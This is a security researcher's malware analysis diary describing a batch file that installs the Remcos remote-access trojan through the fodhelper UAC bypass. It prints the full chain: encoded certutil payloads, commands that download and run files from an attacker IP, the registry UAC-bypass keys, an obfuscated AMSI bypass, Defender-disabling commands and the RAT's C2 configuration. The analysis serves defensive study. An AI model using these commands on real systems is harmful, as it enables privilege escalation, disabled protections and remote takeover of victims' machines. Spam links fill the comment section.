RAT Delivered Through FODHelper

Published: 2022-09-22
Last Updated: 2022-09-22 07:11:21 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

I found a simple batch file that drops a Remcos[1] RAT through an old UAC Bypass technique. This technique is based on the "fodhelper" utility ("Features On Demand Helper"). Once launched, this tool will search for specific registry keys and, if present, will execute their content with high privileges.

The script, called "2.bat", is very simple. Note that opened into a text editor, it will display Chinese characters due to the BOM (Byte Order Mark):

remnux@remnux:/MalwareZoo/20220919$ xxd 2.bat 
00000000: fffe 2663 6c73 0d0a 4065 6368 6f20 6f66  ..&cls..@echo of
00000010: 6620 0d0a 5469 746c 6520 257e 6e30 0d0a  f ..Title %~n0..
00000020: 4d6f 6465 2036 302c 3320 0d0a 636f 6c6f  Mode 60,3 ..colo
00000030: 7220 3042 0d0a 6563 686f 280d 0a65 6368  r 0B..echo(..ech
00000040: 6f20 2020 2020 2020 2020 506c 6561 7365  o         Please
00000050: 2077 6169 742e 2e2e 2061 2077 6869 6c65   wait... a while
00000060: 204c 6f61 6469 6e67 2064 6174 6120 2e2e   Loading data ..
00000070: 2e2e 0d0a 4345 5254 5554 494c 202d 6620  ....CERTUTIL -f 

Here is the decoded script:

cls
@echo off 
Title %~n0
Mode 60,3 
color 0B
echo(
echo         Please wait... a while Loading data ....
CERTUTIL -f -decode "%~f0" "%Temp%\2.bat" >nul 2>&1 
cls
"%Temp%\2.bat"
Exit
-----BEGIN CERTIFICATE-----
QGVjaG8gb2ZmDQplY2hvIFBsZWFzZSB3YWl0IDMwIHNlY29uZHM6IHdlJ3JlIGJ5
cGFzc2luZyB0aGUgQXV0aElEKEhXSUQpLiBUaGlzIHRyYXkgd2lsbCBhdXRvY2xv
c2Ugb25jZSBmaW5pc2hlZC4NCmN1cmwuZXhlIC1zIC0tb3V0cHV0ICVVU0VSUFJP
RklMRSVcTGlua3NccHVlZG8ucHMxIC0tdXJsIGh0dHA6Ly8xNzEuMjIuMzAuMTIw
L3B1ZWRvLnBzMQ0KdGltZW91dCA1ID4gbnVsDQpjdXJsLmV4ZSAtcyAtLW91dHB1
dCAlVVNFUlBST0ZJTEUlXExpbmtzXGFkaGQuYmF0IC0tdXJsIGh0dHA6Ly8xNzEu
MjIuMzAuMTIwL2FkaGQuYmF0DQp0aW1lb3V0IDUgPiBudWwNCmN1cmwuZXhlIC1z
IC0tb3V0cHV0ICVVU0VSUFJPRklMRSVcTGlua3NcbmV0LnZicyAtLXVybCBodHRw
Oi8vMTcxLjIyLjMwLjEyMC9uZXQudmJzDQp0aW1lb3V0IDUgPiBudWwNCnBvd2Vy
c2hlbGwgTmV3LUl0ZW0gLVBhdGggSEtDVTpcU29mdHdhcmVcQ2xhc3Nlc1xtcy1z
ZXR0aW5nc1xzaGVsbFxvcGVuXGNvbW1hbmQgLVZhbHVlICVVU0VSUFJPRklMRSVc
TGlua3NcYWRoZC5iYXQgLUZvcmNlDQpwb3dlcnNoZWxsIE5ldy1JdGVtUHJvcGVy
dHkgLVBhdGggSEtDVTpcU29mdHdhcmVcQ2xhc3Nlc1xtcy1zZXR0aW5nc1xzaGVs
bFxvcGVuXGNvbW1hbmQgLU5hbWUgRGVsZWdhdGVFeGVjdXRlIC1Qcm9wZXJ0eVR5
cGUgU3RyaW5nIC1Gb3JjZQ0KZm9kaGVscGVyDQpleGl0DQpEZWwgJX4wIA0KDQpE
ZWwgJX4wIA0K
-----END CERTIFICATE-----

certutil.exe (a common LOLbin) is used to decode the Base64 data present in the file, dump a new bat file and launch it. This is performed thanks to the "%~f0" which returns the full path of the batch file itself. Here is the bat file:

@echo off
echo Please wait 30 seconds: we're bypassing the AuthID(HWID). This tray will autoclose once finished.
curl.exe -s --output %USERPROFILE%\Links\puedo.ps1 --url hxxp://171[.]22[.]30[.]120/puedo.ps1
timeout 5 > nul
curl.exe -s --output %USERPROFILE%\Links\adhd.bat --url hxxp://171[.]22[.]30[.]120/adhd.bat
timeout 5 > nul
curl.exe -s --output %USERPROFILE%\Links\net.vbs --url hxxp://171[.]22[.]30[.]120/net.vbs
timeout 5 > nul
powershell New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value %USERPROFILE%\Links\adhd.bat -Force
powershell New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
fodhelper
exit
Del %~0 

Once fodhelper is launched, it will execute adhd.bat, which uses the same technique:

cls
@echo off
Title %~n0
Mode 60,3
color 0B
echo(
echo         Please wait... a while Loading data ....
CERTUTIL -f -decode "%~f0" "%Temp%\adhd - Copia.bat" >nul 2>&1
cls
"%Temp%\adhd - Copia.bat"
Exit
-----BEGIN CERTIFICATE-----
QGVjaG8gb2ZmDQplY2hvIEFsbW9zdCBmaW5pc2hlZDogaXQgd2lsbCBhdXRvcnVu
cyBpbiBsZXNzIHRoYW4gMTUgc2Vjb25kcyENCmNkICVVU0VSUFJPRklMRSVcTGlu
a3NcDQpQb3dlclNoZWxsIC1FeGVjdXRpb25Qb2xpY3kgQnlwYXNzIC1GaWxlICJw
dWVkby5wczEiDQplY2hvIEFsbW9zdCBmaW5pc2hlZDogaXQgd2lsbCBhdXRvcnVu
cyBpbiBsZXNzIHRoYW4gMTUgc2Vjb25kcyENCnRpbWVvdXQgMTAgPiBudWwNCnN0
YXJ0IG5ldC52YnMNCmV4aXQNCg0KDQpEZWwgJX4wIA0KDQpEZWwgJX4wIA0K
-----END CERTIFICATE-----

The decoded Base64 contains:

@echo off
echo Almost finished: it will autoruns in less than 15 seconds!
cd %USERPROFILE%\Links\
PowerShell -ExecutionPolicy Bypass -File "puedo.ps1"
echo Almost finished: it will autoruns in less than 15 seconds!
timeout 10 > nul
start net.vbs
exit
Del %~0 

The Powershell script "puedo.ps1" is responsible for downloading and executing the malware:

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Set-MpPreference -DisableRealtimeMonitoring $trUE
Set-MpPreference -DisableIOAVProtection $trUE
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:"
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\"
curl.exe -s --output ("photoscreen\$env:USERNAME\Links\Zu@E.jpeg".Replace('photo','C:\').Replace('screen','Users\').Replace('Zu@E','\zoey').Replace('jpeg','exe')) --url ("colibri://google/Papero.exe".Replace('colibri','http').Replace('google','171[.]22[.]30[.]120'))
cd C:\Users\$env:USERNAME\Links
.\zoey.exe
exit

Note that the script tries to disable AMSI and Microsoft Defender. The malware is a Remcos RAT (SHA256:6e83574ed73d798183a1555a910dcc118ac05cf1eac77306ab6edfdcab9207c3) with the following config:

{
    "c2": [
        "171[.]22[.]30[.]7:5578"
    ],
    "attr": {
        "mutex": "asf4fas8sf48asf84as4f89huhhu99h9h-V446WS",
        "copy_file": "Isass.exe",
        "hide_file": false,
        "copy_folder": "Microsoft Updater",
        "delete_file": false,
        "keylog_file": "logs.dat",
        "keylog_flag": false,
        "audio_folder": "MicRecords",
        "install_flag": true,
        "install_path": "%ProgramFiles%",
        "keylog_crypt": false,
        "mouse_option": false,
        "connect_delay": "0",
        "keylog_folder": "remcos",
        "startup_value": "Windows Host Controller",
        "screenshot_flag": false,
        "screenshot_path": "%AppData%",
        "screenshot_time": "10",
        "connect_interval": "1",
        "hide_keylog_file": false,
        "screenshot_crypt": false,
        "audio_record_time": "5",
        "screenshot_folder": "Screenshots",
        "take_screenshot_time": "5",
        "take_screenshot_option": false
    },
    "rule": "Remcos",
    "botnet": "Papero",
    "family": "remcos"
}

[1] https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 comment(s)
ISC Stormcast For Thursday, September 22nd, 2022 https://isc.sans.edu/podcastdetail.html?id=8184

Comments

What's this all about ..?
password reveal .
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure:

<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.

<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
https://thehomestore.com.pk/
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
https://defineprogramming.com/
https://defineprogramming.com/
Enter comment here... a fake TeamViewer page, and that page led to a different type of malware. This week's infection involved a downloaded JavaScript (.js) file that led to Microsoft Installer packages (.msi files) containing other script that used free or open source programs.
distribute malware. Even if the URL listed on the ad shows a legitimate website, subsequent ad traffic can easily lead to a fake page. Different types of malware are distributed in this manner. I've seen IcedID (Bokbot), Gozi/ISFB, and various information stealers distributed through fake software websites that were provided through Google ad traffic. I submitted malicious files from this example to VirusTotal and found a low rate of detection, with some files not showing as malware at all. Additionally, domains associated with this infection frequently change. That might make it hard to detect.
https://clickercounter.org/
Enter corthrthmment here...

Diary Archives